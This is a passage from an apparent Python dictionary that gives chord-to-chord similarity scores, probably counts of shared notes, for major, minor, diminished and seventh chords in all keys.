'Gs7': 1,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 1,
'Fs7': 0,
'CMajor': 0,
'Em7': 1,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 0,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 0,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 2,
'DMinor': 2,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 0,
'B7': 0,
'AMajor': 0,
'A7': 0,
'Fm7': 2,
'DsMajor': 0,
'E7': 2,
'C7': 0,
'GsMinor': 1,
'Bm7': 1,
'G7': 2,
'Asm7': 2,
'BMajor': 0,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 2,
'AsMajor': 2,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 2,
'DDim': 3,
'CsMajor': 2,
'FMinor': 2,
'EMajor': 1,
'As7': 3,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 2,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 0,
'DsMinor': 0,
},
'CsMajor': {
'AMinor': 0,
'CDim': 0,
'Gs7': 1,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 0,
'Em7': 0,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 2,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 3,
'FDim': 2,
'DMinor': 1,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 0,
'B7': 0,
'AMajor': 1,
'A7': 1,
'Fm7': 2,
'DsMajor': 0,
'E7': 1,
'C7': 0,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 3,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 2,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 3,
'Gm7': 1,
'DDim': 2,
'CsMajor': 3,
'FMinor': 2,
'EMajor': 1,
'As7': 2,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 0,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 2,
'BMinor': 0,
'CMaj7': 0,
'AsMaj7': 1,
'D7': 0,
'Csm7': 2,
'FsMajor': 1,
'Am7': 0,
'DsMinor': 0,
},
'FMinor': {
'AMinor': 1,
'CDim': 1,
'Gs7': 2,
'GMaj7': 0,
'GsDim': 1,
'GsMajor': 2,
'Fs7': 0,
'CMajor': 1,
'Em7': 0,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 0,
'Dm7': 2,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 3,
'FDim': 2,
'DMinor': 1,
'FMajor': 2,
'ADim': 1,
'CMinor': 1,
'EDim': 0,
'B7': 0,
'AMajor': 0,
'A7': 0,
'Fm7': 3,
'DsMajor': 0,
'E7': 1,
'C7': 1,
'GsMinor': 1,
'Bm7': 0,
'G7': 1,
'Asm7': 2,
'BMajor': 0,
'Ds7': 0,
'GsMaj7': 2,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 0,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 1,
'DDim': 2,
'CsMajor': 2,
'FMinor': 3,
'EMajor': 1,
'As7': 2,
'F7': 2,
'FMaj7': 2,
'FsDim': 1,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 1,
'Csm7': 1,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 0,
},
'EMajor': {
'AMinor': 1,
'CDim': 0,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 1,
'Em7': 2,
'Dsm7': 0,
'Gsm7': 2,
'DMaj7': 0,
'Dm7': 0,
'Cm7': 0,
'CsMinor': 2,
'FsMinor': 0,
'DsMaj7': 0,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 0,
'E7': 3,
'C7': 1,
'GsMinor': 2,
'Bm7': 1,
'G7': 1,
'Asm7': 1,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 2,
'Gm7': 0,
'DDim': 1,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 3,
'As7': 1,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 0,
'GMinor': 0,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 3,
'FsMaj7': 0,
'BMinor': 1,
'CMaj7': 2,
'AsMaj7': 0,
'D7': 0,
'Csm7': 3,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 0,
},
'As7': {
'AMinor': 0,
'CDim': 0,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 2,
'DMinor': 2,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 0,
'AMajor': 0,
'A7': 0,
'Fm7': 2,
'DsMajor': 1,
'E7': 2,
'C7': 1,
'GsMinor': 1,
'Bm7': 1,
'G7': 2,
'Asm7': 3,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 2,
'BDim': 2,
'AsMajor': 3,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 0,
'Cs7': 2,
'Gm7': 3,
'DDim': 3,
'CsMajor': 2,
'FMinor': 2,
'EMajor': 1,
'As7': 4,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 2,
'CsDim': 0,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 3,
'D7': 1,
'Csm7': 1,
'FsMajor': 1,
'Am7': 0,
'DsMinor': 1,
},
'F7': {
'AMinor': 2,
'CDim': 2,
'Gs7': 2,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 2,
'Fs7': 0,
'CMajor': 1,
'Em7': 0,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 1,
'Dm7': 3,
'Cm7': 2,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 2,
'FMajor': 3,
'ADim': 3,
'CMinor': 2,
'EDim': 0,
'B7': 2,
'AMajor': 1,
'A7': 1,
'Fm7': 3,
'DsMajor': 1,
'E7': 0,
'C7': 1,
'GsMinor': 1,
'Bm7': 1,
'G7': 1,
'Asm7': 1,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 1,
'DDim': 1,
'CsMajor': 1,
'FMinor': 2,
'EMajor': 0,
'As7': 1,
'F7': 4,
'FMaj7': 3,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 2,
'D7': 2,
'Csm7': 0,
'FsMajor': 0,
'Am7': 2,
'DsMinor': 1,
},
'FMaj7': {
'AMinor': 3,
'CDim': 1,
'Gs7': 1,
'GMaj7': 0,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 2,
'Em7': 1,
'Dsm7': 0,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 3,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 0,
'GMajor': 0,
'EMinor': 1,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 2,
'FMajor': 3,
'ADim': 2,
'CMinor': 1,
'EDim': 1,
'B7': 1,
'AMajor': 2,
'A7': 2,
'Fm7': 2,
'DsMajor': 0,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 1,
'G7': 1,
'Asm7': 1,
'BMajor': 0,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 2,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 2,
'Cs7': 1,
'Gm7': 1,
'DDim': 1,
'CsMajor': 1,
'FMinor': 2,
'EMajor': 1,
'As7': 1,
'F7': 3,
'FMaj7': 4,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 2,
'D7': 2,
'Csm7': 1,
'FsMajor': 0,
'Am7': 3,
'DsMinor': 0,
},
'FsDim': {
'AMinor': 2,
'CDim': 2,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 1,
'Em7': 0,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 2,
'Dm7': 2,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 2,
'DsMaj7': 0,
'BMaj7': 1,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 2,
'ADim': 2,
'CMinor': 1,
'EDim': 0,
'B7': 2,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 0,
'E7': 0,
'C7': 1,
'GsMinor': 0,
'Bm7': 2,
'G7': 0,
'Asm7': 0,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 2,
'AsDim': 0,
'Fsm7': 2,
'Cs7': 0,
'Gm7': 0,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 0,
'As7': 0,
'F7': 2,
'FMaj7': 2,
'FsDim': 3,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 0,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 3,
'Csm7': 0,
'FsMajor': 1,
'Am7': 2,
'DsMinor': 1,
},
'GDim': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 1,
'Em7': 1,
'Dsm7': 2,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 1,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 2,
'B7': 0,
'AMajor': 1,
'A7': 2,
'Fm7': 0,
'DsMajor': 2,
'E7': 0,
'C7': 2,
'GsMinor': 0,
'Bm7': 0,
'G7': 1,
'Asm7': 2,
'BMajor': 0,
'Ds7': 3,
'GsMaj7': 1,
'AsMinor': 2,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 2,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 0,
'FMaj7': 0,
'FsDim': 0,
'GDim': 3,
'GMinor': 2,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 0,
'FsMaj7': 2,
'BMinor': 0,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 0,
'Csm7': 1,
'FsMajor': 2,
'Am7': 1,
'DsMinor': 1,
},
'GMinor': {
'AMinor': 0,
'CDim': 0,
'Gs7': 0,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 1,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 1,
'Cm7': 2,
'CsMinor': 0,
'FsMinor': 0,
'DsMaj7': 3,
'BMaj7': 1,
'GMajor': 2,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 0,
'DMinor': 1,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 2,
'B7': 0,
'AMajor': 0,
'A7': 1,
'Fm7': 0,
'DsMajor': 2,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 1,
'G7': 2,
'Asm7': 1,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 2,
'AMaj7': 0,
'DMajor': 1,
'AsDim': 1,
'Fsm7': 0,
'Cs7': 0,
'Gm7': 3,
'DDim': 1,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 0,
'As7': 2,
'F7': 0,
'FMaj7': 0,
'FsDim': 0,
'GDim': 2,
'GMinor': 3,
'CsDim': 1,
'DsDim': 0,
'EMaj7': 0,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 1,
'AsMaj7': 2,
'D7': 1,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 1,
},
'CsDim': {
'AMinor': 1,
'CDim': 0,
'Gs7': 0,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 2,
'CMajor': 2,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 2,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 0,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 1,
'EDim': 2,
'B7': 0,
'AMajor': 2,
'A7': 3,
'Fm7': 0,
'DsMajor': 1,
'E7': 1,
'C7': 2,
'GsMinor': 0,
'Bm7': 0,
'G7': 1,
'Asm7': 1,
'BMajor': 0,
'Ds7': 2,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 2,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 1,
'As7': 0,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 2,
'GMinor': 1,
'CsDim': 3,
'DsDim': 0,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 0,
'CMaj7': 2,
'AsMaj7': 0,
'D7': 0,
'Csm7': 2,
'FsMajor': 1,
'Am7': 2,
'DsMinor': 0,
},
'DsDim': {
'AMinor': 1,
'CDim': 2,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 0,
'Em7': 0,
'Dsm7': 2,
'Gsm7': 2,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 0,
'FDim': 0,
'DMinor': 1,
'FMajor': 1,
'ADim': 2,
'CMinor': 1,
'EDim': 0,
'B7': 3,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 1,
'E7': 0,
'C7': 0,
'GsMinor': 1,
'Bm7': 2,
'G7': 0,
'Asm7': 0,
'BMajor': 2,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 0,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 2,
'AsDim': 0,
'Fsm7': 2,
'Cs7': 0,
'Gm7': 0,
'DDim': 0,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 0,
'As7': 0,
'F7': 2,
'FMaj7': 1,
'FsDim': 2,
'GDim': 0,
'GMinor': 0,
'CsDim': 0,
'DsDim': 3,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 1,
'D7': 2,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 2,
},
'EMaj7': {
'AMinor': 1,
'CDim': 1,
'Gs7': 2,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 2,
'Fs7': 1,
'CMajor': 1,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 3,
'DMaj7': 0,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 2,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 2,
'DMinor': 0,
'FMajor': 0,
'ADim': 1,
'CMinor': 1,
'EDim': 1,
'B7': 2,
'AMajor': 1,
'A7': 1,
'Fm7': 2,
'DsMajor': 1,
'E7': 3,
'C7': 1,
'GsMinor': 3,
'Bm7': 1,
'G7': 1,
'Asm7': 1,
'BMajor': 2,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 2,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 2,
'Gm7': 0,
'DDim': 1,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 3,
'As7': 1,
'F7': 1,
'FMaj7': 1,
'FsDim': 0,
'GDim': 0,
'GMinor': 0,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 4,
'FsMaj7': 0,
'BMinor': 1,
'CMaj7': 2,
'AsMaj7': 0,
'D7': 0,
'Csm7': 3,
'FsMajor': 0,
'Am7': 1,
'DsMinor': 1,
},
'FsMaj7': {
'AMinor': 0,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 3,
'CMajor': 0,
'Em7': 0,
'Dsm7': 3,
'Gsm7': 1,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 2,
'FDim': 1,
'DMinor': 1,
'FMajor': 1,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 1,
'E7': 0,
'C7': 1,
'GsMinor': 0,
'Bm7': 1,
'G7': 1,
'Asm7': 3,
'BMajor': 1,
'Ds7': 2,
'GsMaj7': 0,
'AsMinor': 3,
'BDim': 1,
'AsMajor': 2,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 2,
'Fsm7': 2,
'Cs7': 2,
'Gm7': 2,
'DDim': 1,
'CsMajor': 2,
'FMinor': 1,
'EMajor': 0,
'As7': 2,
'F7': 1,
'FMaj7': 1,
'FsDim': 1,
'GDim': 2,
'GMinor': 1,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 0,
'FsMaj7': 4,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 2,
'D7': 1,
'Csm7': 1,
'FsMajor': 3,
'Am7': 0,
'DsMinor': 2,
},
'BMinor': {
'AMinor': 0,
'CDim': 1,
'Gs7': 1,
'GMaj7': 3,
'GsDim': 2,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 0,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 2,
'Dm7': 1,
'Cm7': 0,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 2,
'EMinor': 1,
'CsMaj7': 0,
'FDim': 1,
'DMinor': 1,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 0,
'B7': 2,
'AMajor': 0,
'A7': 0,
'Fm7': 0,
'DsMajor': 0,
'E7': 2,
'C7': 0,
'GsMinor': 1,
'Bm7': 3,
'G7': 2,
'Asm7': 0,
'BMajor': 2,
'Ds7': 0,
'GsMaj7': 0,
'AsMinor': 0,
'BDim': 2,
'AsMajor': 1,
'AMaj7': 0,
'DMajor': 2,
'AsDim': 0,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 1,
'DDim': 1,
'CsMajor': 0,
'FMinor': 0,
'EMajor': 1,
'As7': 1,
'F7': 0,
'FMaj7': 0,
'FsDim': 1,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 1,
'FsMaj7': 1,
'BMinor': 3,
'CMaj7': 1,
'AsMaj7': 1,
'D7': 2,
'Csm7': 1,
'FsMajor': 1,
'Am7': 0,
'DsMinor': 1,
},
'CMaj7': {
'AMinor': 2,
'CDim': 1,
'Gs7': 1,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 3,
'Em7': 3,
'Dsm7': 0,
'Gsm7': 1,
'DMaj7': 0,
'Dm7': 1,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 0,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 2,
'EMinor': 3,
'CsMaj7': 1,
'FDim': 1,
'DMinor': 0,
'FMajor': 1,
'ADim': 1,
'CMinor': 2,
'EDim': 2,
'B7': 1,
'AMajor': 1,
'A7': 2,
'Fm7': 1,
'DsMajor': 1,
'E7': 2,
'C7': 3,
'GsMinor': 1,
'Bm7': 1,
'G7': 2,
'Asm7': 0,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 2,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 1,
'DMajor': 0,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 2,
'As7': 0,
'F7': 1,
'FMaj7': 2,
'FsDim': 1,
'GDim': 1,
'GMinor': 1,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 2,
'FsMaj7': 0,
'BMinor': 1,
'CMaj7': 4,
'AsMaj7': 0,
'D7': 1,
'Csm7': 2,
'FsMajor': 0,
'Am7': 3,
'DsMinor': 0,
},
'AsMaj7': {
'AMinor': 1,
'CDim': 0,
'Gs7': 0,
'GMaj7': 1,
'GsDim': 1,
'GsMajor': 0,
'Fs7': 1,
'CMajor': 0,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 0,
'DMaj7': 2,
'Dm7': 3,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 1,
'DsMaj7': 2,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 1,
'DMinor': 3,
'FMajor': 2,
'ADim': 1,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 1,
'E7': 1,
'C7': 1,
'GsMinor': 0,
'Bm7': 2,
'G7': 2,
'Asm7': 2,
'BMajor': 0,
'Ds7': 1,
'GsMaj7': 0,
'AsMinor': 2,
'BDim': 2,
'AsMajor': 3,
'AMaj7': 1,
'DMajor': 2,
'AsDim': 1,
'Fsm7': 1,
'Cs7': 1,
'Gm7': 3,
'DDim': 2,
'CsMajor': 1,
'FMinor': 1,
'EMajor': 0,
'As7': 3,
'F7': 2,
'FMaj7': 2,
'FsDim': 1,
'GDim': 1,
'GMinor': 2,
'CsDim': 0,
'DsDim': 1,
'EMaj7': 0,
'FsMaj7': 2,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 4,
'D7': 2,
'Csm7': 0,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 1,
},
'D7': {
'AMinor': 2,
'CDim': 2,
'Gs7': 2,
'GMaj7': 2,
'GsDim': 1,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 1,
'Em7': 1,
'Dsm7': 1,
'Gsm7': 1,
'DMaj7': 3,
'Dm7': 3,
'Cm7': 1,
'CsMinor': 0,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 2,
'FMajor': 2,
'ADim': 2,
'CMinor': 1,
'EDim': 0,
'B7': 2,
'AMajor': 1,
'A7': 1,
'Fm7': 1,
'DsMajor': 0,
'E7': 1,
'C7': 1,
'GsMinor': 0,
'Bm7': 3,
'G7': 1,
'Asm7': 0,
'BMajor': 1,
'Ds7': 0,
'GsMaj7': 1,
'AsMinor': 0,
'BDim': 1,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 3,
'AsDim': 0,
'Fsm7': 2,
'Cs7': 0,
'Gm7': 1,
'DDim': 1,
'CsMajor': 0,
'FMinor': 1,
'EMajor': 0,
'As7': 1,
'F7': 2,
'FMaj7': 2,
'FsDim': 3,
'GDim': 0,
'GMinor': 1,
'CsDim': 0,
'DsDim': 2,
'EMaj7': 0,
'FsMaj7': 1,
'BMinor': 2,
'CMaj7': 1,
'AsMaj7': 2,
'D7': 4,
'Csm7': 0,
'FsMajor': 1,
'Am7': 2,
'DsMinor': 1,
},
'Csm7': {
'AMinor': 1,
'CDim': 0,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 2,
'GsMajor': 1,
'Fs7': 2,
'CMajor': 1,
'Em7': 2,
'Dsm7': 1,
'Gsm7': 2,
'DMaj7': 1,
'Dm7': 0,
'Cm7': 0,
'CsMinor': 3,
'FsMinor': 1,
'DsMaj7': 0,
'BMaj7': 1,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 2,
'FDim': 2,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 2,
'A7': 2,
'Fm7': 1,
'DsMajor': 0,
'E7': 3,
'C7': 1,
'GsMinor': 2,
'Bm7': 1,
'G7': 1,
'Asm7': 2,
'BMajor': 1,
'Ds7': 1,
'GsMaj7': 1,
'AsMinor': 1,
'BDim': 1,
'AsMajor': 0,
'AMaj7': 3,
'DMajor': 0,
'AsDim': 2,
'Fsm7': 2,
'Cs7': 3,
'Gm7': 0,
'DDim': 1,
'CsMajor': 2,
'FMinor': 1,
'EMajor': 3,
'As7': 1,
'F7': 0,
'FMaj7': 1,
'FsDim': 0,
'GDim': 1,
'GMinor': 0,
'CsDim': 2,
'DsDim': 0,
'EMaj7': 3,
'FsMaj7': 1,
'BMinor': 1,
'CMaj7': 2,
'AsMaj7': 0,
'D7': 0,
'Csm7': 4,
'FsMajor': 1,
'Am7': 1,
'DsMinor': 0,
},
'FsMajor': {
'AMinor': 0,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 0,
'Fs7': 3,
'CMajor': 0,
'Em7': 0,
'Dsm7': 3,
'Gsm7': 1,
'DMaj7': 2,
'Dm7': 0,
'Cm7': 1,
'CsMinor': 1,
'FsMinor': 2,
'DsMaj7': 1,
'BMaj7': 2,
'GMajor': 0,
'EMinor': 0,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 0,
'FMajor': 0,
'ADim': 0,
'CMinor': 0,
'EDim': 1,
'B7': 1,
'AMajor': 1,
'A7': 1,
'Fm7': 0,
'DsMajor': 1,
'E7': 0,
'C7': 1,
'GsMinor': 0,
'Bm7': 1,
'G7': 0,
'Asm7': 2,
'BMajor': 1,
'Ds7': 2,
'GsMaj7': 0,
'AsMinor': 2,
'BDim': 0,
'AsMajor': 1,
'AMaj7': 1,
'DMajor': 1,
'AsDim': 2,
'Fsm7': 2,
'Cs7': 1,
'Gm7': 1,
'DDim': 0,
'CsMajor': 1,
'FMinor': 0,
'EMajor': 0,
'As7': 1,
'F7': 0,
'FMaj7': 0,
'FsDim': 1,
'GDim': 2,
'GMinor': 1,
'CsDim': 1,
'DsDim': 1,
'EMaj7': 0,
'FsMaj7': 3,
'BMinor': 1,
'CMaj7': 0,
'AsMaj7': 1,
'D7': 1,
'Csm7': 1,
'FsMajor': 3,
'Am7': 0,
'DsMinor': 2,
},
'Am7': {
'AMinor': 3,
'CDim': 1,
'Gs7': 1,
'GMaj7': 1,
'GsDim': 0,
'GsMajor': 1,
'Fs7': 1,
'CMajor': 3,
'Em7': 2,
'Dsm7': 0,
'Gsm7': 0,
'DMaj7': 1,
'Dm7': 2,
'Cm7': 2,
'CsMinor': 1,
'FsMinor': 1,
'DsMaj7': 1,
'BMaj7': 0,
'GMajor': 1,
'EMinor': 2,
'CsMaj7': 1,
'FDim': 0,
'DMinor': 1,
'FMajor': 2,
'ADim': 2,
'CMinor': 2,
'EDim': 2,
'B7': 1,
'AMajor': 2,
'A7': 3,
'Fm7': 1,
